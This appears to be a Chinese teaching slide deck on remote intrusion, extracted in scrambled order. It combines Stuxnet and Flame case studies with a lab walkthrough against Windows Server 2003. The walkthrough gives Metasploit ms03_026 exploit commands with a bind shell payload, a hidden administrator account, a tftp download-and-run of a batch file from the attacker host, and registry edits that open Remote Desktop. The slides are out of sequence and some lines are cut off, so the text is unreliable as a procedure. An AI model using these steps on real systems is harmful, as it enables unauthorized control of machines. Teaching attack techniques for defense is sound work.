第6章 远程入侵

但就在几个月前，美国和以色列还在警告伊朗只需一年就能拥有快速制造核武器的能力，为什么会突然出现如此重大的变化？ 因为布什尔核电站遭到“震网”病毒攻击，1/5的离心机报废。自2010年8月该核电站启用后就发生连串故障，伊朗政府表面声称是 天热所致，但真正原因却是核电站遭病毒攻击。一种名为“震网”（STUXNET）的蠕虫病毒侵入了伊朗工厂企业，甚至进入西门子 为核电站设计的工业控制软件，并可夺取对一系列核心生产设备尤其是核电设备的关键控制权。
思考
1、这两个案例中攻击者使用了哪些攻击技术？ 2、0day漏洞会产生什么后果？ 3、分析“震网”病毒是怎样传播的？有何危害？
6.1 远程入侵的分类
• 远程入侵是指攻击者利用服务器和操作系统存在的缺陷和安全漏洞，通过远程控制、上传 病毒木马等手段控制服务器并得到数据的访问权限。攻击者在远程入侵成功后往往可以在 用户不知情的情况下秘密窃取数据，也可以对数据进行恶意更改等操作
6.2 一次较为完整的远程入侵过程
为了将3389.BAT文件上传到远程主机上并运行，可以在攻击方的系统上安装tftp32软件作为tftp服 务端，将远程主机作为客户端，这样就可以从服务端来下载该文件，从而间接实现文件的上传。 如图6-6、6-7所示，做好tftp服务端的设置和上传文件准备工作。
图6-6 Tftp软件设置
IP地址 安装软件
192.168.1.9 Metasploit、tftpd32
192较为完整的远程入侵过程
1、在攻击方的系统上安装Metasploit软件，在Windows程序列表中找到“Metasploit 3”，打开 Metasploit Console，如图6-1所示
第6章 远程入侵
• 6.1 远程入侵的分类 • 6.2 一次较为完整的远程入侵过程 • 6.3 预留后门
案例一：“震网”病毒奇袭伊朗核电站
2011年2月，伊朗突然宣布暂时卸载首座核电站——布什尔核电站的核燃料，西方国家也悄悄对伊朗核计划进展预测进行了重 大修改。以色列战略事务部长摩西•亚阿隆在这之前称，伊朗至少需要3年才能制造出核弹。美国国务卿希拉里也轻描淡写地说，伊 朗的计划因为“技术问题”已被拖延。
（4）工业控制系统入侵
• 震网病毒是首个发现的专门针对西门子工业控制系统的病毒，曾经造成伊朗核电站推迟发电。这种针 对工业控制系统的入侵一般带有军事目的，将成为未来战争中的一种重要武器。
6.1 远程入侵的分类
• 根据入侵策略的不同，可以把远程入侵分为以下几种类型：
（1）主动定点式入侵
• 从字面上很容易理解，这种入侵的目标非常明确。先确定远程入侵的对象，然后采取各种攻击手段获 取攻击目标的系统控制权。主动定点式入侵的主要过程如下：身份隐藏->探测并确定攻击目标->远程 登陆，然后获得攻击目标的控制权->远程控制->预留后门->消灭踪迹。
微软调查结果显示：“震网”正在伊朗等中亚国家肆虐，发作频次越来越高，并有逐步向亚洲东部扩散的迹象。“震网”包含 空前复杂的恶意代码，是一种典型的计算机病毒，能自我复制，并将副本通过网络传输，任何一台个人电脑只要和染毒电脑相连， 自动传播给其他与之相连的电脑，最后造成大量网络流量的连锁效应，导致整个网络系统瘫痪。“震网”主要通过U盘和局域网进 行传播，是第一个利用WINDOWS的0DAY漏洞专门针对工业控制系统发动攻击的恶意软件，能够攻击石油运输管道、发电厂、大型 通信设施、机场等多种工业和民用基础设施，被称为“网络导弹”。
（2）欺骗诱导式入侵
• 不同于主动定点式入侵，这种入侵方式相对被动，一开始并没有明确的攻击目标，而是通过大量发送 电子邮件或者通过QQ、MSN等聊天工具广泛发送信息，诱骗上网用户打开某个已经被挂马的网站链接、 附件，或者下载某个已经被植入木马病毒的网络热门文件，一旦有用户中了木马，攻击者就可以随意 控制该用户的计算机。
6.2 一次较为完整的远程入侵过程
• 以入侵Windows Server 2003服务器为例，演示一次较为完整的远程入侵过程
序号 1 2 3 4
操作系统
表6-1 软件安装列表
软件名称
功能和作用
Metasploit
缓冲区溢出攻击
Tftpd32
tftp服务器
3389.bat
Windows自带远程桌面 连接
开启远程桌面 连接远程计算机桌面
表6-2 攻防实验配置
Host OS （攻击方） Guest OS （受攻击方）
Windows XP SP3
Windows 2003标准版 SP0
表6-3 3389.bat文件内容
3389.bat
echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg
6.1 远程入侵的分类
• 根据入侵对象的不同，可以把远程入侵分为以下几种类型
（1）个人上网电脑入侵
• 通常利用个人电脑的各种系统漏洞和木马病毒，甚至利用社会工程学等手段实施入侵。
（2）服务器入侵
• 通常利用服务器的各种漏洞（0DAY漏洞、WEB漏洞等）实施入侵。
（3）无线网络入侵
• 一种模式是以破解无线网络信号的访问密码达到“蹭网”的目的。ROGUE AP是另一种入侵模式，其方法 是攻击者在无线网络中安放未经授权的AP或者客户机，提供对无线网络的开放式访问，无线网络用户 在不知情的情况下以为自己通过很好的信号连入了INTERNET，却不知自己的各类敏感信息已经遭到了 攻击者的监听，攻击者甚至可以将木马链接轻松插入用户访问的各个网址中。
图6-1 Metasploit Console主界面
6.2 一次较为完整的远程入侵过程
2、设置攻击参数，在命令提示符下依次输入以下命令： use exploit/windows/dcerpc/ms03_026_dcom //利用漏洞ms03_026实施入侵 > set RHOST 192.168.1.8 //设置远程入侵目标的ip地址 > set PAYLOAD windows/shell/bind_tcp //设置获取目标主机shell的方式 > exploit //输入exploit命令进行入侵
俄罗斯卡巴斯基实验室则认为，“火焰”病毒结构的复杂性和攻击目标的选择性与此前出现的“震网”病毒极 其相近，二者应“师出同门”。2010年7月，德国专家首先发现“震网”病毒，伊朗、印度尼西亚、印度等国部分 电脑用户反映受到这种病毒攻击。该病毒对电脑的传染性很强，可严重威胁工业系统的安全。西方媒体当时普遍猜 测“震网”病毒的目标是伊朗的布什尔核电站。
图6-2 成功获取远程主机的shell
6.2 一次较为完整的远程入侵过程
用ipconfig命令查看这台主机的IP，如图6-3所示
图6-3 远程主机的IP地址
6.2 一次较为完整的远程入侵过程
3、在远程主机上建立用户，并将该用户添加到管理员组，如图6-4所示，输入以下命令： > net user zjbti$ 123 /add //注意语法格式，123代表密码，后面有空格。 > net localgroup administrators zjbti$ /add
图6-11 利用远程桌面连接软件登录系统
6.2 一次较为完整的远程入侵过程
如图6-12所示，已经成功通过之前创建的zjbti$管理员账号登录远程系统，可以对远程主机进行各 种操作了。
案例二：网络战病毒“火焰”现身美国
2012年6月，肆虐中东的计算机病毒“火焰”现身美国网络空间，甚至攻破了微软公司的安全系统。微软公司已 经向用户提供了紧急的防火补丁。
微软公司发布警告称，“火焰”病毒的制作者已经找到使用微软安全系统来伪造安全证书的方法。这样，该病毒 就能在不被防病毒软件发现的情况下任意传播。微软公司现已修补了安全漏洞，并将自己被攻破的安全证书列入“ 不受信任的”证书名单中。
微软公司表示，由于“火焰”是一种定向精确的高级病毒，包括美国政府和金融机构在内的绝大部分微软用户都 不会被感染。但是，微软公司不得不采取行动，以防止“不老练”的网络攻击者效仿“火焰”技术进行漫无目标的广泛 攻击。
目前还没有国家或组织对“火焰”病毒宣称负责，但此间媒体已开始热议美国与伊朗的网络战争。一些网络安全 专家分析病毒代码后认为，“火焰”可能是针对伊朗网络战中的最新一波攻击，最可能由“某一富裕国家”研发，而据 信美国和以色列的嫌疑最大。
图6-7 Tftp文件下载列表
6.2 一次较为完整的远程入侵过程
如图6-8所示，输入如下命令： > tftp 192.168.1.9 get 3389.bat //从服务端下载3389.bat文件 > 3389.bat //运行批处理文件并开启远程桌面服务